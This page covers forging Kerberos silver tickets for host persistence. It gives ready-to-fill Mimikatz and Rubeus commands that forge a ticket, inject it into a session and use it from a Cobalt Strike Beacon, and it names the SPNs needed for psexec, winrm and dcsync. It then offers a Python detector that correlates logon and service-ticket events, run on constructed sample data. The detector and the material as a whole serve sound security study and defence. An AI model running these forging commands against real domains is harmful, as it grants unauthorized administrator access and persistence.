A silver ticket is a forged service ticket that grants the attacker whatever privileges they write into it. Forging one requires knowledge of the service account's password (or its hash; see Kerberoasting). For host persistence the service is CIFS/SMB, whose principal is the machine account. For more examples of how to use a silver ticket, see Kerberos Attack: Silver Ticket Edition.

Requirements

Target SPN by persistence method:

  • psexec: HOST or CIFS
  • winrm: HOST or HTTP
  • dcsync (DC only): LDAP

Mimikatz

To create a silver ticket via Mimikatz (ironic that the command is called golden):

kerberos::golden /user:ANY_DOMAIN_USER /domain:AD_DOMAIN /sid:DOMAIN_SID /target:TARGET_SPN_DOMAIN /service:TARGET_SPN_PROTOCOL /rc4:SERVICE_NTLM_HASH /ptt
  • DOMAIN_SID is the SID of the domain
    • run whoami /user to get the current domain user's SID
    • then remove the trailing RID, i.e. the last 5 characters (-nnnn, where each n is a digit)
  • /rc4: encrypt the service ticket with RC4, using the service account's NTLM password hash as the key
  • /ptt: inject the ticket into the current logon session's memory

By default this creates a ticket that impersonates the built-in local Administrator (RID 500) on the target server and carries several high-privileged group memberships.

Rubeus

To create a silver ticket via Rubeus:

PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:[target-spn]/[target-host-fqdn] /aes256:[machine-hash-aes256] /user:[target-user] /domain:[domain-fqdn] /sid:[domain-sid] /nowrap

To use a silver ticket (here from a Cobalt Strike Beacon via execute-assembly, creating a new logon session with the ticket applied):

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[target-user] /password:[does-not-matter] /ticket:[ticket-b64]
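Because a silver ticket is forged on the attacker's side from the service account hash, the domain controller never sees a service ticket request for it; the target host simply accepts the ticket. The detection logic below is an added example written for this page (not from the original notes or the Mimikatz/Rubeus projects): it correlates Kerberos network logons (event 4624, logon type 3) on a host with service ticket requests (event 4769) on the DC and flags logons with no request behind them, and separately lists RC4-encrypted service tickets, the input to the Kerberoasting step this page names as a prerequisite. The event records, field names and timestamps are constructed sample data.

```python
from datetime import datetime, timedelta

# Constructed sample events (not taken from the original page). Only the fields
# the correlation needs are kept. Event 4624 is recorded on the target host;
# event 4769 (Kerberos service ticket requested) is recorded on the DC.
HOST_4624 = [
    {"time": "2024-05-01T10:00:05", "user": "jdoe", "host": "FILE01",
     "logon_type": 3, "auth_pkg": "Kerberos"},
    {"time": "2024-05-01T10:07:12", "user": "Administrator", "host": "FILE01",
     "logon_type": 3, "auth_pkg": "Kerberos"},
    {"time": "2024-05-01T10:09:40", "user": "svc_backup", "host": "FILE01",
     "logon_type": 3, "auth_pkg": "NTLM"},
]
DC_4769 = [
    {"time": "2024-05-01T10:00:03", "user": "jdoe",
     "service": "cifs/FILE01", "enc_type": "0x12"},
    {"time": "2024-05-01T10:08:55", "user": "jdoe",
     "service": "cifs/FILE02", "enc_type": "0x17"},
]

def _ts(event):
    return datetime.fromisoformat(event["time"])

def unmatched_kerberos_logons(host_events, dc_events, window_seconds=300):
    """Return Kerberos network logons (4624, type 3) on a host for which the DC
    logged no 4769 for the same user and a service on that host within
    window_seconds before the logon. A forged service ticket never passes
    through the KDC, so such a logon has no TGS request behind it."""
    window = timedelta(seconds=window_seconds)
    suspicious = []
    for logon in host_events:
        if logon["logon_type"] != 3 or logon["auth_pkg"] != "Kerberos":
            continue
        t = _ts(logon)
        matched = any(
            req["user"].lower() == logon["user"].lower()
            # SPN is "service/host"; partition yields "" if no slash, so no match
            and req["service"].partition("/")[2].upper() == logon["host"].upper()
            and t - window <= _ts(req) <= t
            for req in dc_events
        )
        if not matched:
            suspicious.append(logon)
    return suspicious

def rc4_service_tickets(dc_events):
    """4769 entries whose ticket was encrypted with RC4 (encryption type 0x17)."""
    return [req for req in dc_events if req["enc_type"] == "0x17"]

if __name__ == "__main__":
    for e in unmatched_kerberos_logons(HOST_4624, DC_4769):
        print("no 4769 behind Kerberos logon:", e["user"], "->", e["host"], e["time"])
```

Genuine service tickets are reused for their whole lifetime (10 hours by default), so a production correlation must keep the issuance window at least that wide or track issued tickets per user and service; the 5-minute window here only fits the sample data. PAC validation on the server, where enabled, is the control that makes a forged PAC fail rather than merely leave a log gap.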